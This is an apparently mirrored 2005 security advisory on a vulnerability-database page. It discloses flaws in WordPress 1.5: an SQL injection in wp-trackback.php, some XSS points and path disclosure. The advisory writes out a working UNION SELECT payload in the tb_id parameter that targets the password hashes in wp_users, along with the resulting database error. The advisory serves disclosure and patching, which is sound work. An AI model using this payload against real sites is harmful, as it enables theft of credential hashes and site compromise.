Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormThomas WaldeggerPACKETSTORM:39288
HistoryAug 14, 2005 - 12:00 a.m.

wordpress15sql.txt

2005-08-1400:00:00
Thomas Waldegger
packetstormsecurity.com
20
JSON
`  
  
---------------------------------------------------  
| BuHa Security-Advisory #1 | May 17th, 2005 |  
---------------------------------------------------  
| Vendor | Wordpress |  
| URL | http://wordpress.org/ |  
| Version | <= Wordpress 1.5 |  
| Risk | Moderate (SQL-Injection) |  
---------------------------------------------------  
  
o Description:  
=============  
  
WordPress is a state-of-the-art semantic personal publishing platform  
with a focus on aesthetics, web standards, and usability.   
  
Visit http://wordpress.org/ for detailed information.  
  
o SQL-Injection:  
===============  
  
The most critical vulnerability in the 1.5 release of wordpress is an  
SQL-Injection in `wp-trackback.php'. It's not easily exploitable  
because you do not get a result when you inject a valid query but it's  
possible to bruteforce values in the tables - for example the password  
hashes.  
  
Here some details:  
The parameter `tb_id' in `wp-trackback.php' is not validated correctly  
and there are no quotes in the SQL-query so an attacker is able to   
insert sql commands.  
  
$pingstatus = $wpdb->get_var("SELECT ping_status FROM $wpdb->posts  
WHERE ID = $tb_id");  
  
Example: (I converted the POST-request into a GET-request.)  
  
> $tb_id = 1 union select user_pass,0 from wp_users  
> $url = bla  
> $title = bla  
  
</wp-trackback.php?tb_id=1%20union%20select%200,user_pass%20from%20  
wp_users&url=bla&title=bla>  
  
By injecting this query I get following databae error:  
  
> WordPress database error:  
> [The used SELECT statements have a different number of columns]  
> SELECT ping_status FROM wp_posts WHERE ID = 1 union select 0,   
> user_pass from wp_users  
  
When I insert "1 union select user_pass from wp_users" as value for  
`tb_id' I get no error message because the query was well-formed -  
logical. Through the possibility to insert any sql-command it's  
possible to 'reconstruct' values of the tables.  
  
o XSS:  
=====  
  
</wp-admin/edit.php?s=[XSS]&submit=Search>  
</wp-admin/post.php?action=confirmdeletecomment&comment=1&p=[XSS]>  
  
o Path Disclosure:  
=================  
  
</wordpress-1.5-strayhorn/wp-content/themes/*>  
</wordpress-1.5-strayhorn/wp-includes/*>  
</wordpress-1.5-strayhorn/wp-admin/*>  
  
> Fatal error: Call to undefined function add_filter() in  
> [...]/htdocs/testenv/blogs/wordpress/wordpress-1.5-strayhorn/  
> wp-content/themes/classic/comments-popup.php on line 3  
  
o Disclosure Timeline:  
=====================  
  
17 Apr 05 - Security flaws discovered.  
19 Apr 05 - Vendor contacted.  
10 May 05 - Vendor released bugfixed version.  
17 May 05 - Public release.  
  
o Solution:  
==========  
  
Upgrade to wordpress 1.5.1 [1]  
  
o Credits:  
=========  
  
Thomas Waldegger <[email protected]>  
BuHa-Security Community - http://buha.info/board/  
  
[1] http://wordpress.org/development/2005/05/one-five-one/  
`
JSON